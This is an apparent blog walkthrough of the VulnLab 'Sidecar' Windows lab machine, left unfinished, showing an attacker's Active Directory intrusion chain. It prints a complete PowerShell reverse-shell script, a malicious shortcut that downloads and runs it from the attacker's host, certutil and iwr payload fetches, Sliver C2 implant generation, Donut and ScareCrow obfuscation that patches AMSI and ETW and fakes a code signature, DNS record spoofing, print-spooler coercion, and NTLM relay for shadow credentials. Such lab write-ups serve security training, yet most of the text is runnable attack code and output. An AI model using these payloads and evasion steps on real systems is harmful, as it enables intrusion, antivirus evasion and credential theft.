vulnlab-sidecar

vulnab-sidecar

a very hard Windows machine

Preparing the Shellcode

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.8.2.138'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

 

Create a malicious link on a Windows pc

i used

powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))

 

Uploading the malicious link file

└─$ smbclient //DC01.sidecar.vl/Public

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
  .                                   D        0  Sun Dec 10 15:29:38 2023
  ..                                DHS        0  Sun Dec 10 15:20:57 2023
  Backup                              D        0  Sun Dec 10 15:29:37 2023
  Common                              D        0  Sun Dec 17 12:09:03 2023
  Install                             D        0  Sun Dec 10 15:51:08 2023
  Transfer                            D        0  Sun Dec 10 15:29:32 2023

        6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
  .                                   D        0  Sun Dec 17 12:09:03 2023
  ..                                  D        0  Sun Dec 10 15:29:38 2023
  Common.lnk                          A     1741  Sun Dec 10 15:47:04 2023
  Custom                              D        0  Sun Dec 17 12:14:14 2023
  Install.lnk                         A     1666  Sun Dec 10 15:47:05 2023
  Transfer.lnk                        A     1681  Sun Dec 10 15:47:05 2023

        6291455 blocks of size 4096. 2227210 blocks available
smb: \Common\> cd Custom
smb: \Common\Custom\> ls
  .                                   D        0  Sun Dec 17 12:14:14 2023
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2227210 blocks available

smb: \Common\Custom\> rm *.lnk
smb: \Common\Custom\> put hillie3.lnk
putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s)
smb: \Common\Custom\> ls
  .                                   D        0  Wed Jul 17 16:30:06 2024
  ..                                  D        0  Sun Dec 17 12:09:03 2023
  hillie3.lnk                         A     2006  Wed Jul 17 16:30:06 2024
  info.txt                            A       45  Sun Dec 10 17:08:38 2023

        6291455 blocks of size 4096. 2237771 blocks available
smb: \Common\Custom\>

Serving the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ python3 -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 -
10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -

 

Getting the shell

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ rlwrap nc -nlvp 443                        
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami
sidecar\e.klaymore

C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\

c:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users

11/30/2023  11:55 PM    <DIR>          .
11/30/2023  11:55 PM    <DIR>          ..
01/12/2024  05:59 PM    <DIR>          Admin
12/02/2023  01:24 PM    <DIR>          administrator
01/12/2024  05:50 PM    <DIR>          e.klaymore
11/30/2023  05:49 PM    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)   3,720,708,096 bytes free

c:\Users>cd e.klaymore

c:\Users\e.klaymore>cd desktop

c:\Users\e.klaymore\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\Users\e.klaymore\Desktop

12/01/2023  09:26 AM    <DIR>          .
12/01/2023  09:26 AM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   3,720,572,928 bytes free

c:\Users\e.klaymore\Desktop>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

c:\Users\e.klaymore\Desktop>net users

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>

so we have

c:\Users\e.klaymore\Desktop>net user

User accounts for \\WS01

-------------------------------------------------------------------------------
Admin                    Administrator            DefaultAccount           
Deployer                 Gast                     
The command completed successfully.


c:\Users\e.klaymore\Desktop>net user /domain
The request will be processed at a domain controller for domain Sidecar.vl.


User accounts for \\DC01.Sidecar.vl

-------------------------------------------------------------------------------
A.Roberts                Administrator            E.Klaymore               
Guest                    J.Chaffrey               krbtgt                   
M.smith                  O.osvald                 P.robinson               
svc_deploy               
The command completed successfully.

.

c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\temp>dir
 Volume in drive C has no label.
 Volume Serial Number is 442A-8056

 Directory of c:\temp

07/17/2024  05:57 PM    <DIR>          .
07/17/2024  05:57 PM    <DIR>          ..
07/17/2024  05:57 PM            45,272 nc64.exe
               1 File(s)         45,272 bytes
               2 Dir(s)   3,713,388,544 bytes free

Start Sliver C2

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sudo systemctl start sliver
[sudo] password for puck: 
                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver                     
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain deathtouch
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe 

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 20s
[*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe

sliver >  

Let’s donut this file

┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ./donut payload.exe            

  [ Donut shellcode generator v0.9.3
  [ Copyright (c) 2019 TheWover, Odzhan

  [ Instance type : Embedded
  [ Module file   : "payload.exe"
  [ Entropy       : Random names + Encryption
  [ File type     : EXE
  [ Target CPU    : x86+amd64
  [ AMSI/WDLP     : continue
  [ Shellcode     : "loader.bin"
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3]
└─$ ls
donut  donut.1  EVIL_USUAL.exe  examples  lib  LICENSE  loader.bin  payload.exe  README.html

Then Scarecrow the file

┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ./ScareCrow -I loader.bin --domain microsoft.com
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
    \/     \/     \/            \/        \/                      
                            (@Tyl0us)
    “Fear, you must understand is more than a mere obstacle. 
    Fear is a TEACHER. the first one you ever had.”
    
[!] Missing Garble... Downloading it now
[*] Encrypting Shellcode Using ELZMA Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[+] Patched AMSI Enabled
[+] Sleep Timer set for 2584 milliseconds 
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneNote's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing OneNote.exe With a Fake Cert
[+] Signed File Created
[+] Binary Compiled
[!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ ls
Cryptor  go.sum       Loader      main.json    README.md  ScareCrow.go  Struct
go.mod   limelighter  loader.bin  OneNote.exe  ScareCrow  Screenshots   Utils
                                                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow]
└─$ 

got a session, but after uploading SharpHound.exe , my sliver session gets disconnected

sliver > sessions

[*] No sessions 🙁

[*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST

sliver > use 2a9abc07-3992-40be-918f-375eee061970

[*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970)

sliver (EVIL_USUAL) > info

        Session ID: 2a9abc07-3992-40be-918f-375eee061970
              Name: EVIL_USUAL
          Hostname: ws01
              UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2
          Username: SIDECAR\E.Klaymore
               UID: S-1-5-21-3976908837-939936849-1028625813-1609
               GID: S-1-5-21-3976908837-939936849-1028625813-513
               PID: 3812
                OS: windows
           Version: 10 build 10240 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://10.8.2.138:8888
    Remote Address: 10.10.151.22:49977
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago)
      Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago)

sliver (EVIL_USUAL) > ls

c:\temp (2 items, 33.6 MiB)
===========================
-rw-rw-rw-  nc64.exe  44.2 KiB  Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe   33.6 MiB  Thu Jul 18 08:49:01 +0200 2024


sliver (EVIL_USUAL) > whoami 

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:33 +0200 2024


sliver (EVIL_USUAL) > upload SharpHound.exe

[*] Wrote file to c:\temp\SharpHound.exe

sliver (EVIL_USUAL) > ls

c:\temp (3 items, 34.6 MiB)
===========================
-rw-rw-rw-  nc64.exe        44.2 KiB    Thu Jul 18 08:21:32 +0200 2024
-rw-rw-rw-  one.exe         33.6 MiB    Thu Jul 18 08:49:01 +0200 2024
-rw-rw-rw-  SharpHound.exe  1022.0 KiB  Thu Jul 18 08:54:53 +0200 2024


[!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST

[!] Active session disconnected

sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

So we need the beacon.exe in a new lnk file

C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe

.

created a working beacon, and transfered it to the box with

certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe

and runned c:\programdata\power.exe on the box

.

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'

All hackers gain persist
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #2

[!] Job #2 stopped (tcp/https)

[!] Job #2 stopped (tcp/https)

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

               

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

[*] Beacon f4937c47 sitecar-3 - 10.10.177.38:50444 (ws01) - windows/amd64 - Mon, 14 Oct 2024 20:21:04 CEST

sliver > use f4937c47-c290-4c60-a7bc-438fcf292b8d

[*] Active beacon sitecar-3 (f4937c47-c290-4c60-a7bc-438fcf292b8d)

sliver (sitecar-3) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Tasked beacon sitecar-3 (952ffb7c)

[+] sitecar-3 completed task 952ffb7c


sliver (sitecar-3) >  

.

sliver (sitecar-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon sitecar-3 (15da41ae)

sliver (sitecar-3) > ls

[*] Tasked beacon sitecar-3 (a86427ba)

[+] sitecar-3 completed task a86427ba

c:\ProgramData\temp (0 items, 0 B)
==================================


[+] sitecar-3 completed task 15da41ae

[*] sharp-hound-4 output:
2024-10-23T08:49:59.4279652+02:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-10-23T08:49:59.8243987+02:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2024-10-23T08:49:59.8747021+02:00|INFORMATION|Initializing SharpHound at 8:49 AM on 10/23/2024
2024-10-23T08:50:00.0784908+02:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for Sidecar.vl : DC01.Sidecar.vl

2024-10-23T08:50:48.7730432+02:00|INFORMATION|Saving cache with stats: 295 ID to type mappings.
 297 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-23T08:50:48.8487177+02:00|INFORMATION|SharpHound Enumeration Completed at 8:50 AM on 10/23/2024! Happy Graphing!

[*] Output saved to /tmp/sharp-hound-4_.2445145387.log

sliver (sitecar-3) > ls

[*] Tasked beacon sitecar-3 (0b9f5da2)

[+] sitecar-3 completed task 0b9f5da2

c:\ProgramData\temp (2 items, 83.9 KiB)
=======================================
-rw-rw-rw-  20241023085045_BloodHound.zip                         31.2 KiB  Wed Oct 23 08:50:48 +0200 2024
-rw-rw-rw-  Y2RjZTMzZTktMzhkNS00MDAwLTkwZTUtM2MwNDdmM2QyMzRj.bin  52.7 KiB  Wed Oct 23 08:50:48 +0200 2024


sliver (sitecar-3) > download 20241023085045_BloodHound.zip

[*] Tasked beacon sitecar-3 (44459e36)

[+] sitecar-3 completed task 44459e36

[*] Wrote 31936 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/sidecar/20241023085045_BloodHound.zip

sliver (sitecar-3) >  

To be continued …

1st we need to promote our beacon to a session to be able to run execute shellcode

 

Warning: if we use the interactive-shellcode session, we need to restart the sliver server afterwards to execute assemblies

thus like this

sliver > sessions 

[*] No sessions 🙁

[*] Beacon e5de6c1f sitecar-3 - 10.10.173.118:50379 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:55:46 CEST

sliver > use e5de6c1f-8a91-454b-9154-8006649aa751

[*] Active beacon sitecar-3 (e5de6c1f-8a91-454b-9154-8006649aa751)

sliver (sitecar-3) > interactive 

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon sitecar-3 (85062590)

[*] Session 23eb3ba7 sitecar-3 - 10.10.173.118:50418 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:57:02 CEST

sliver (sitecar-3) > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39

[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)

sliver (sitecar-3) > sessions

 ID         Transport   Remote Address        Hostname   Username             Operating System   Health  
========== =========== ===================== ========== ==================== ================== =========
 23eb3ba7   http(s)     10.10.173.118:50418   ws01       SIDECAR\E.Klaymore   windows/amd64      [ALIVE] 

sliver (sitecar-3) > ^C
input Ctrl-c once more to exit
sliver (sitecar-3) > ^C
interrupted
                                                                                                                     

and then run execute-shellcode -i /tmp/UnmanagedPowerShell.bin

sliver (sitecar-3) > ^C
interrupted
                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ sliver
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain fear
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

sliver > sessions

 ID         Transport   Remote Address        Hostname   Username             Operating System   Health  
========== =========== ===================== ========== ==================== ================== =========
 23eb3ba7   http(s)     10.10.173.118:50418   ws01       SIDECAR\E.Klaymore   windows/amd64      [ALIVE] 

sliver > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39

[*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39)

sliver (sitecar-3) > execute-shellcode -i /tmp/UnmanagedPowerShell.bin

[*] Started remote shell with pid 2108

PS > dir


    Directory: C:\temp


Mode                LastWriteTime         Length Name                                              
----                -------------         ------ ----                                              
-a----       10/25/2024   8:53 AM       24830704 power.exe                                         



PS > New-ADIDNSNode -Tombstone -Verbose -Node puck.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=puck.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A
[+] ADIDNS node puck.sidecar.vl added

PS > 

.

sliver (sitecar-3) > execute-assembly -i -E /tmp/SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"

snip...2024-10-25T12:13:31.9634793+02:00|INFORMATION|Saving cache with stats: 58 ID to type mappings.
 59 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-10-25T12:13:31.9939532+02:00|INFORMATION|SharpHound Enumeration Completed at 12:13 PM on 10/25/2024! Happy Graphing!

*] Tasked beacon sitecar-3 (e2afe45b)

[+] sitecar-3 completed task e2afe45b

we can see that we can’t create new machine accounts [ms-ds-machineaccountquota=0]

sliver (sitecar-3) > inline-execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"

[*] Tasked beacon sitecar-3 (189947d6)

sliver (sitecar-3) > execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*"

[*] Tasked beacon sitecar-3 (c7f43d96)

sliver (sitecar-3) > tasks 

 ID         State       Message Type            Created                          Sent                             Completed                      
========== =========== ======================= ================================ ================================ ================================
 c7f43d96   sent        InvokeExecuteAssembly   Fri, 25 Oct 2024 15:39:01 CEST   Fri, 25 Oct 2024 15:39:07 CEST                                  
 74051079   sent        RegisterExtension       Fri, 25 Oct 2024 15:37:55 CEST   Fri, 25 Oct 2024 15:37:59 CEST                                  
 189947d6   sent        CallExtension           Fri, 25 Oct 2024 15:37:55 CEST   Fri, 25 Oct 2024 15:37:59 CEST                                  
 a730ea0b   completed   Download                Fri, 25 Oct 2024 15:18:49 CEST   Fri, 25 Oct 2024 15:18:56 CEST   Fri, 25 Oct 2024 15:18:56 CEST 
 db7bfb31   completed   Pwd                     Fri, 25 Oct 2024 15:18:19 CEST   Fri, 25 Oct 2024 15:18:22 CEST   Fri, 25 Oct 2024 15:18:22 CEST 


[+] sitecar-3 completed task c7f43d96

[*] Output:

[?] Using DC : DC01.Sidecar.vl
[?] Object   : DC=Sidecar
    Path     : LDAP://DC=Sidecar,DC=vl

[?] Iterating object properties

[+] ridmanagerreference
    |_ CN=RID Manager$,CN=System,DC=Sidecar,DC=vl
[+] objectcategory
    |_ CN=Domain-DNS,CN=Schema,CN=Configuration,DC=Sidecar,DC=vl
[+] msds-nctype
    |_ 0
[+] systemflags
    |_ -1946157056
[+] minpwdage
    |_ -864000000000
[+] dscorepropagationdata
    |_ 1/1/1601 12:00:00 AM
[+] uascompat
    |_ 0
[+] usnchanged
    |_ 110627
[+] instancetype
    |_ 5
[+] creationtime
    |_ 133743100080295319
[+] pwdhistorylength
    |_ 24
[+] ms-ds-machineaccountquota
    |_ 0
[+] subrefs
    |_ DC=ForestDnsZones,DC=Sidecar,DC=vl
    |_ DC=DomainDnsZones,DC=Sidecar,DC=vl
    |_ CN=Configuration,DC=Sidecar,DC=vl
[+] lockoutduration
    |_ -18000000000
[+] name
    |_ Sidecar

.

this means we can’t perform a RBCD Attack https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users as we would need another computer or service account which we control

sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin

[*] Started remote shell with pid 1652

PS > pwd

Path            
----            
C:\Windows\Tasks

.

# on sliver
[server] sliver (sitecar-3) > socks5 start

[*] Started SOCKS5 127.0.0.1 1081  

# on local machine
proxychains -q nxc smb 192.168.100.101 -u 'puck' -p ''

.

Webdav

We first need the authentication request or hash from our machine account. As we cant relay SMB to SMB (or LDAP) we need to change our source to HTTP.
For this we need to enable Webdav (https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient)

We can check the current status using https://github.com/G0ldenGunSec/GetWebDAVStatus/

from session ( not beacon ) run

sliver (sitecar-3) > upload GetWebDAVStatus.exe

[*] Wrote file to c:\Windows\Tasks\GetWebDAVStatus.exe

sliver (sitecar-3) > execute -o "GetWebDAVStatus.exe" "127.0.0.1" 

[*] Output:
[+] WebClient service is active on 127.0.0.1

sliver (sitecar-3) > execute "cmd.exe" "/c net use h: http://10.8.2.138/blub"

[*] Command executed successfully

sliver (sitecar-3) >  

DNS

Webdav is only working if we use a DNS name for our target, so we first need to add a new DNS entry to the AD. https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing

For this we can use Powermad (https://github.com/Kevin-Robertson/Powermad) even in a new spawned interactive shell

I used this sliver shellcode: https://github.com/mmnoureldin/UnmanagedPowerShell?tab=readme-ov-file which also contains Powermad

warning : If we use the interactive-shellcode session, we need to restart the sliver server afterwards to execute assemblies

So we execute-shellcode -i /payloads/UnmanagedPowerShell.bin , and then we add a dns entry with New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138

.

sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin

[*] Started remote shell with pid 3364

PS > pwd

Path            
----            
C:\Windows\Tasks



PS > New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=kali.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A
[+] ADIDNS node kali.sidecar.vl added

PS > 

WebDav to LDAP relay

Finally we need to trigger the http authentication with Petitpotam or SpoolSample

.

Thus now, we exit, and restart the SliverC2 server

then we execute

execute-assembly -i -E /payloads/payloads/SpoolSample.exe “10.8.2.138 kali.sidecar.vl@80/blub.txt”
inline-execute-assembly /payloads/SpoolSample.exe “10.18.2.138 vulnlab@80/blub.txt”

.

thus

sliver (sitecar-3) > use b31f8184-a729-480c-b757-1ac3a3e67669

[*] Active session sitecar-3 (b31f8184-a729-480c-b757-1ac3a3e67669)

sliver (sitecar-3) > whoami

Logon ID: SIDECAR\E.Klaymore
[*] Current Token ID: SIDECAR\E.Klaymore
sliver (sitecar-3) > execute-assembly -i -E /payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt"

[!] rpc error: code = Unknown desc = implant timeout
sliver (sitecar-3) >  

 

catch it

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ impacket-ntlmrelayx -t ldaps://dc01 --shadow-credentials --shadow-target 'ws01$'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.185.38, attacking target ldaps://dc01
[!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)
[-] Authenticating against ldaps://dc01 as SIDECAR/E.KLAYMORE FAILED
[*] HTTPD(80): Client requested path: /puckshell.txt

Now at problem  error:

The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP).

to be continued …

.

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *